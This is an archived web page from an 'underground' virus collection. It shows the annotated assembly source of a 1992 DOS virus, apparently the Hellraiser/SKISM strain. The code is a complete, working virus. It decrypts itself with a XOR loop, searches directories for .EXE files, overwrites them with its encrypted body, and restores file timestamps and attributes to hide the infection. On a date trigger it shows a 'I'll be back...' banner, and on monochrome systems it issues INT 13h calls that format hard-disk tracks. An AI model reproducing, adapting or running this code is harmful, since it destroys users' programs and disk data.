Underground

home *** CD-ROM | disk | FTP | other *** search

/ Underground / Underground CD1.iso / virii / zrodla / h / hr.asm < prev next >

Wrap

Assembly Source File | 1998-01-14 | 18.7 KB | 413 lines

;NAME: HR.DEC ;FILE SIZE: 0062Ch - 1580d ;START (CS:IP): 00100h ;CODE END: 0072Ch ;CODE ORIGIN: 00100h ;DATE: Sun Aug 02 17:20:02 1992 CODE SEGMENT BYTE PUBLIC 'CODE' ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING P00100 PROC ORG 0100h START: JMP Short BEGIN ;--------------------------------------------------- NOP ENCRKEY:DB 0Ch,32h ; 32h may not be needed... ;OR AH,32 BEGIN: CALL CRYPT ; Decrypt the virus JMP H00520 ;--------------------------------------------------- CRYPT: PUSH CX MOV SI,OFFSET MESSAGE MOV DI,SI MOV CX,0766h CLD LOOP_1: LODSW XOR AX,DS:ENCRKEY ;DS may not be needed STOSW DEC CX JNZ LOOP_1 POP CX RET ;--------------------------------------------------- INFECT: MOV DX,0100h ;Offset to begin at MOV BX,DS:[HANDLE] ;BX=File handle PUSH BX ;I don't know why, BX doesn't change. MOV CX,062Ch ;CX=number of bytes to write CALL CRYPT ;Encrypt before saving POP BX ;I don't know why, BX doesn't change. MOV AX,4000h ;AH = 40h, write to file. INT 21h ;Infect the file. PUSH BX ;Again, BX never changes. CALL CRYPT ; . . . . . . . . . POP BX RET ;RET_Near ;--------------------------------------------------- ; This is the big, red, block letters that shows when it goes off. MESSAGE: DB 0Fh,10h,18h,19h,1Fh,"I'll be back..." DB 18h,18h,14h,20h,20h,00Ch,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h DB 14h,19h,05h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h DB 20h,0DEh,10h,19h,05h,14h,19h,05h,0DEh,10h,20h,20h,14h,19h,06h DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h DB 14h,19h,05h,0DEh,10h,20h,14h,19h,05h,0DEh,18h,20h,20h,0DEh,10h DB 20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,20h,20h DB 0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h,05h,14h,19h,06h,16h,0DEh DB 10h,20h,14h,19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h DB 05h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,06h,0DEh,18h,20h DB 20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h DB 04h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h,05h,14h,20h DB 20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h DB 20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h DB 20h,16h,0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h DB 0DEh,10h,20h,20h,14h,20h,20h,16h,0DEh,18h,14h,19h,05h,0DEh,10h,20h DB 14h,19h,05h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,0DEh DB 10h,19h,05h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h DB 20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h DB 19h,05h,16h,0DEh,10h,20h,14h,19h,04h,0DEh,10h,20h,20h,14h,20h,20h DB 0DEh,10h,20h,20h,14h,20h,20h,0DEh,18h,20h,20h,0DEh,10h,20h,14h,20h,20h DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h DB 04h,14h,20h,20h,0DEh,10h,19h,05h,14h,19h,04h,0DEh,10h,19h,02h,14h DB 19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,16h DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,19h,04h,16h,0DEh,18h,14h DB 20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h DB 20h,14h,19h,05h,0DEh,10h,20h,14h,19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh DB 10h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,05h,0DEh DB 10h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,18h,20h,20h,0DEh DB 10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,05h DB 0DEh,10h,20h,14h,19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h DB 20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h DB 14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h DB 14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,18h,20h,10h,19h,03h,14h DB 20h,10h,19h,02h,14h,20h,20h,10h,19h,05h,14h,20h,20h,10h,19h,06h,14h,20h DB 20h,10h,20h,20h,14h,20h,10h,19h,02h,14h,20h,10h,19h,03h,14h,20h,10h,19h DB 02h,14h,20h,10h,19h,02h,14h,20h,20h,10h,20h,20h,14h,20h,10h,19h DB 03h,14h,20h,20h,10h,19h,06h,14h,20h,20h,10h,19h,04h,14h,20h DB 10h,19h,02h,14h,20h,20h,18h,20h,10h,19h,03h,14h,20h,10h,19h,02h DB 14h,20h,10h,19h,06h,14h,20h,10h,19h,07h,14h,20h,10h,19h,02h,14h DB 20h,10h,19h,02h,14h,20h,10h,19h,03h,14h,20h,10h,19h,06h,14h,20h DB 10h,19h,02h,14h,20h,10h,19h,03h,14h,20h,10h,19h,07h,14h,20h,10h,19h DB 05h,14h,20h,10h,19h,03h,14h,20h,18h,20h,10h,19h,00Fh,14h,20h,10h,19h DB 07h,14h,20h,10h,19h,02h,14h,20h,10h,19h,07h,14h,20h,10h,19h,06h DB 14h,20h,10h,19h,07h,14h,20h,10h,19h,07h,14h,20h,10h,19h,00Ah,14h DB 20h,18h,20h,10h,19h,00Fh,14h,20h,10h,19h,07h,14h,20h,10h,19h,13h,14h DB 20h,10h,19h,10h,14h,20h,18h,10h,19h,40h,14h,20h,18h,18h,2Ah ;--------------------------------------------------- DB 00 ;00454 DB "*.EXE" ;00455 DB 00h,"\",00h,03h ;0045A DB 8 DUP("?") ;0045E 3F DB " " ;00466 202020 ;--------------------------------------------------- ;This area is perplexing. Doesn't seem to be ever called, nor read from. ADC AX,[BP+DI] ;00469 1303 __ ADD [BX+SI],AL ;0046B 0000 __ ADD [BP+SI],CH ;0046D 002A _* SHR BP,1 ;0046F D1ED __ DEC DX ;00471 4A J ADC DL,DS:[0E278h] ;00472 121678E2 __x_ PUSH SS ;00476 16 _ ADD [BX+SI],AL ;00477 0000 __ ADD [BX+SI],AL ;00479 0000 __ ;--------------------------------------------------- DB "ARMOR" ;0047B 41524D4F52 DB 00h ;00480 DB " " ;00481 2020 DB 00h ;00483 DB 00h ;00484 DB 00h ;00485 DB 00h ;00486 DB 00h ;00487 DB 03h ;00488 DB 8 DUP("?") ;00489 3F DB "EXE" ;00491 455845 DB 07h ;00494 DB 04h ;00495 DB 00h ;00496 DB "3" ;00497 33 DB 1Fh ;00498 DB "*" ;00499 2A DB 0D1h ;0049A DB 0EDh ;0049B DB "J " ;0049C 4A20 DB 02h ;0049E DB "x" ;0049F 78 DB 0F0h ;004A0 DB 16h ;004A1 DB 02h ;004A2 DB 00h ;004A3 DB 00h ;004A4 DB 00h ;004A5 DB "SAMPLE3.EXE" ;004A6 53414D504C4533 DB 00h ;004B1 DB 00h ;004B2 DB 9Eh ;004B3 DB "-]" ;004B4 2D5D DB 04h ;004B6 DB 88h ;004B7 DB 04h ;004B8 DB 9Eh ;004B9 DB "-" ;004BA 2D DB 00h ;004BB DB "ARMOR" ;004BC 41524D4F52 DB 00h ;004C1 DB 58 DUP(00h) ;004C2 HANDLE: DB 05h ;004FC DB 00h ;004FD DB 02h ;004FE DB "x" ;004FF 78 DB 0F0h ;00500 DB 16h ;00501 DB " " ;00502 20 DB 00h ;00503 DB 0CDh ;00504 DB " " ;00505 20 DB 00h ;00506 DB 00h ;00507 DB "Written by Dennis Yelle" ;00508 5772697474656E DB 00h ;0051F ;--------------------------------------------------- ; Create new encryption key H00520: MOV AX,3000h ;00520 B80030 __0 INT 21h ;2-DOS_Ver ;00523 CD21 _! CMP AL,02h ;00525 3C02 <_ JB H0056B ;00527 7242 rB MOV AH,2Ch ;00529 B42C _, INT 21h ;1-Get_Time ;0052B CD21 _! MOV DS:[0103h],DX ;0052D 89160301 ____ ; Check to see if it's the last Friday in month, if so, go off. H00531: MOV AH,2Ah ;00531 B42A _* INT 21h ;1-Get_Date ;00533 CD21 _! CMP DL,19h ;00535 80FA19 ___ JL H0053E ;00538 7C04 |_ CMP AL,05h ;0053A 3C05 <_ JZ H00541 ;0053C 7403 t_ H0053E: JMP H005F2 ;0053E E9B100 ___ ;--------------------------------------------------- ; GO OFF! H00541: MOV AH,0Fh ;00541 B40F INT 10h ;Get current vid mode ;00543 CD10 CMP AL,07h ;00545 3C07 JZ H00568 ;If mono, format ;00547 741F MOV AX,0003h ;80x25 16 color ;00549 B80300 INT 10h ;Set video mode ;0054C CD10 MOV AH,01h ;0054E B401 MOV CX,0808h ;No cursor ;00550 B90808 INT 10h ;Set cursor size ;00553 CD10 MOV SI,013Ah ;00555 BE3A01 MOV AX,0B800h ;Video segment ;00558 B800B8 MOV ES,AX ;ES_Chg ;0055B 8EC0 MOV DI,0000h ; ;0055D BF0000 MOV CX,0319h ;00560 B91903 CALL H0057E ; . . . . . . . . . ;00563 E81800 JMP Short H00531 ;00566 EBC9 ;--------------------------------------------------- H00568: JMP Short H005DC ;00568 EB72 _r ;--------------------------------------------------- NOP ;0056A 90 _ H0056B: JMP H0061E ;0056B E9B000 ___ ;--------------------------------------------------- DB " -=PHALCON=- " ;0056E 20202D3D504841 DB 00h ;0057D ;--------------------------------------------------- ; Display message... TheDraw algorythm for unpacking image. H0057E: JCXZ H005DB ;Jumps to a ret ;0057E E35B _[ MOV DX,DI ;00580 8BD7 __ XOR AX,AX ;00582 33C0 3_ CLD ;00584 FC _ H00585: LODSB ;Take a byte ;00585 AC _ CMP AL,20h ;If it's <space ;00586 3C20 < JB H0058F ;Jump ;00588 7205 r_ STOSW ;Move to screen ;0058A AB _ H0058B: LOOP H00585 ;0058B E2F8 __ JMP Short H005DB ;0058D EB4C _L ;--------------------------------------------------- H0058F: CMP AL,10h ;If it's not<10h ;0058F 3C10 <_ JNB H0059A ;Jump ;00591 7307 s_ AND AH,0F0h ;00593 80E4F0 ___ OR AH,AL ;00596 0AE0 __ JMP Short H0058B ;00598 EBF1 __ ;--------------------------------------------------- H0059A: CMP AL,18h ;0059A 3C18 <_ JZ H005B1 ;0059C 7413 t_ JNB H005B9 ;0059E 7319 s_ SUB AL,10h ;005A0 2C10 ,_ ADD AL,AL ;005A2 02C0 __ ADD AL,AL ;005A4 02C0 __ ADD AL,AL ;005A6 02C0 __ ADD AL,AL ;005A8 02C0 __ AND AH,8Fh ;005AA 80E48F ___ OR AH,AL ;005AD 0AE0 __ JMP Short H0058B ;005AF EBDA __ ;--------------------------------------------------- H005B1: ADD DX,00A0h ;005B1 81C2A000 ____ MOV DI,DX ;005B5 8BFA __ JMP Short H0058B ;005B7 EBD2 __ ;--------------------------------------------------- H005B9: CMP AL,1Bh ;005B9 3C1B <_ JB H005C4 ;005BB 7207 r_ JNZ H0058B ;005BD 75CC u_ XOR AH,80h ;005BF 80F480 ___ JMP Short H0058B ;005C2 EBC7 __ ;--------------------------------------------------- H005C4: CMP AL,19h ;005C4 3C19 <_ MOV BX,CX ;005C6 8BD9 __ LODSB ;005C8 AC _ MOV CL,AL ;005C9 8AC8 __ MOV AL,20h ;005CB B020 _ JZ H005D1 ;005CD 7402 t_ LODSB ;005CF AC _ DEC BX ;005D0 4B K H005D1: XOR CH,CH ;005D1 32ED 2_ INC CX ;005D3 41 A REPZ STOSW ;005D4 F3AB __ MOV CX,BX ;005D6 8BCB __ DEC CX ;005D8 49 I LOOPNZ H00585 ;005D9 E0AA __ H005DB: RET ;RET_Near ;005DB C3 _ ;End of display message procedure ;--------------------------------------------------- H005DC: MOV AH,15h ;005DC B415 __ MOV DL,80h ;005DE B280 __ INT 13h ;BAT-Dsk_Type ;005E0 CD13 __ CMP AH,03h ;005E2 80FC03 ___ JNZ H005F2 ;005E5 750B u_ MOV AX,0504h ;005E7 B80405 ___ MOV CX,DS:[0103h] ;005EA 8B0E0301 ____ MOV DL,80h ;005EE B280 __ INT 13h ;B-Fmt_FD_Trk ;005F0 CD13 __ H005F2: MOV DX,045Dh ;005F2 BA5D04 _]_ MOV AH,1Ah ;005F5 B41A __ INT 21h ;1-Set_DTA ;005F7 CD21 _! MOV AH,19h ;005F9 B419 __ INT 21h ;1-Get_Cur_Dr ;005FB CD21 _! MOV DL,AL ;005FD 8AD0 __ INC DL ;005FF FEC2 __ MOV AH,47h ;00601 B447 _G MOV SI,04BCh ;00603 BEBC04 ___ INT 21h ;2-Cur_Dir ;00606 CD21 _! MOV DX,045Bh ;00608 BA5B04 _[_ MOV AH,3Bh ;0060B B43B _; INT 21h ;2-Chg_Dir ;0060D CD21 _! MOV CX,0013h ;0060F B91300 ___ MOV DX,0453h ;00612 BA5304 _S_ MOV AH,4Eh ;00615 B44E _N INT 21h ;2-Srch_1st_Fl_Hdl ;00617 CD21 _! CMP AX,0012h ;00619 3D1200 =__ JNZ H00621 ;0061C 7503 u_ H0061E: JMP Short H00671 ;0061E EB51 _Q ;--------------------------------------------------- NOP ;00620 90 _ H00621: MOV AH,4Fh ;00621 B44F _O INT 21h ;2-Srch_Nxt_Fl_Hdl ;00623 CD21 _! CMP AX,0012h ;00625 3D1200 =__ JZ H00671 ;00628 7447 tG MOV DX,047Bh ;0062A BA7B04 _{_ MOV AH,3Bh ;0062D B43B _; INT 21h ;2-Chg_Dir ;0062F CD21 _! MOV AH,2Fh ;00631 B42F _/ INT 21h ;2-Get_DTA ;00633 CD21 _! MOV DS:[04B3h],ES ;00635 8C06B304 ____ MOV DS:[04B5h],BX ;00639 891EB504 ____ MOV DX,0488h ;0063D BA8804 ___ MOV AH,1Ah ;00640 B41A __ INT 21h ;1-Set_DTA ;00642 CD21 _! MOV CX,0007h ;00644 B90700 ___ MOV DX,0455h ;00647 BA5504 _U_ MOV AH,4Eh ;0064A B44E _N INT 21h ;2-Srch_1st_Fl_Hdl ;0064C CD21 _! CMP AX,0012h ;0064E 3D1200 =__ JNZ H00674 ;00651 7521 u! H00653: MOV AH,4Fh ;00653 B44F _O INT 21h ;2-Srch_Nxt_Fl_Hdl ;00655 CD21 _! CMP AX,0012h ;00657 3D1200 =__ JNZ H00674 ;0065A 7518 u_ MOV DX,045Bh ;0065C BA5B04 _[_ MOV AH,3Bh ;0065F B43B _; INT 21h ;2-Chg_Dir ;00661 CD21 _! MOV AH,1Ah ;00663 B41A __ MOV DS,DS:[04B3h] ;DS_Chg ;00665 8E1EB304 ____ MOV DX,DS:[04B5h] ;00669 8B16B504 ____ INT 21h ;1-Set_DTA ;0066D CD21 _! JMP Short H00621 ;0066F EBB0 __ ;--------------------------------------------------- H00671: JMP Short H006EC ;00671 EB79 _y ;--------------------------------------------------- NOP ;00673 90 _ H00674: MOV AH,2Fh ;00674 B42F _/ INT 21h ;2-Get_DTA ;00676 CD21 _! MOV DS:[04B9h],ES ;00678 8C06B904 ____ MOV DS:[04B7h],BX ;0067C 891EB704 ____ MOV DX,04A6h ;00680 BAA604 ___ MOV BX,0488h ;00683 BB8804 ___ MOV AX,[BX+18h] ;00686 8B4718 _G_ MOV DS:[0500h],AX ;00689 A30005 ___ MOV AX,[BX+16h] ;0068C 8B4716 _G_ MOV DS:[04FEh],AX ;0068F A3FE04 ___ MOV AX,[BX+15h] ;00692 8B4715 _G_ MOV AX,4300h ;00695 B80043 __C INT 21h ;2-Fl_Hdl_Attr ;00698 CD21 _! MOV DS:[0502h],CX ;0069A 890E0205 ____ MOV AX,4301h ;0069E B80143 __C XOR CX,CX ;006A1 33C9 3_ INT 21h ;1-TERM_norm:21h-00h;006A3 CD21 _! ;--------------------------------------------------- MOV AX,3D00h ;006A5 B8003D __= INT 21h ;2-Open_Fl_Hdl ;006A8 CD21 _! JB H006CF ;006AA 7223 r# MOV DS:[HANDLE],AX ;006AC A3FC04 ___ MOV AH,3Fh ;006AF B43F _? MOV BX,DS:[HANDLE] ;006B1 8B1EFC04 ____ MOV CX,0002h ;006B5 B90200 ___ MOV DX,0504h ;006B8 BA0405 ___ INT 21h ;2-Rd_Fl_Hdl ;006BB CD21 _! MOV AH,3Eh ;006BD B43E _> MOV BX,DS:[HANDLE] ;006BF 8B1EFC04 ____ INT 21h ;2-Close_Fl_Hdl ;006C3 CD21 _! MOV BX,DS:[0504h] ;006C5 8B1E0405 ____ CMP BX,03EBh ;006C9 81FBEB03 ____ JNZ H006DE ;006CD 750F u_ H006CF: MOV AH,1Ah ;006CF B41A __ MOV DS,DS:[04B9h] ;DS_Chg ;006D1 8E1EB904 ____ MOV DX,DS:[04B7h] ;006D5 8B16B704 ____ INT 21h ;1-Set_DTA ;006D9 CD21 _! JMP H00653 ;006DB E975FF _u_ ;--------------------------------------------------- H006DE: MOV DX,04A6h ;006DE BAA604 ___ MOV AX,3D02h ;006E1 B8023D __= INT 21h ;2-Open_Fl_Hdl ;006E4 CD21 _! MOV DS:[HANDLE],AX ;006E6 A3FC04 ___ CALL INFECT ; . . . . . . . . . ;006E9 E834FA _4_ H006EC: MOV AX,5701h ;006EC B80157 __W MOV BX,DS:[HANDLE] ;006EF 8B1EFC04 ____ MOV CX,DS:[04FEh] ;006F3 8B0EFE04 ____ MOV DX,DS:[0500h] ;006F7 8B160005 ____ INT 21h ;2-Fl_Hdl_Date_Time ;006FB CD21 _! MOV AX,4301h ;006FD B80143 __C MOV CX,DS:[0502h] ;00700 8B0E0205 ____ MOV DX,04A6h ;00704 BAA604 ___ INT 21h ;2-Fl_Hdl_Attr ;00707 CD21 _! MOV AH,3Bh ;00709 B43B _; MOV DX,045Bh ;0070B BA5B04 _[_ INT 21h ;2-Chg_Dir ;0070E CD21 _! MOV AH,3Bh ;00710 B43B _; MOV DX,04BCh ;00712 BABC04 ___ INT 21h ;2-Chg_Dir ;00715 CD21 _! MOV AX,4C00h ;00717 B8004C __L INT 21h ;2-TERM_w_Ret_Cd ;0071A CD21 _! ;--------------------------------------------------- DB "Hellraiser/SKISM" ;0071C 48656C6C726169 ;--------------------------------------------------- P00100 ENDP CODE ENDS END H00100 ;-------------------------------------------------------------------------------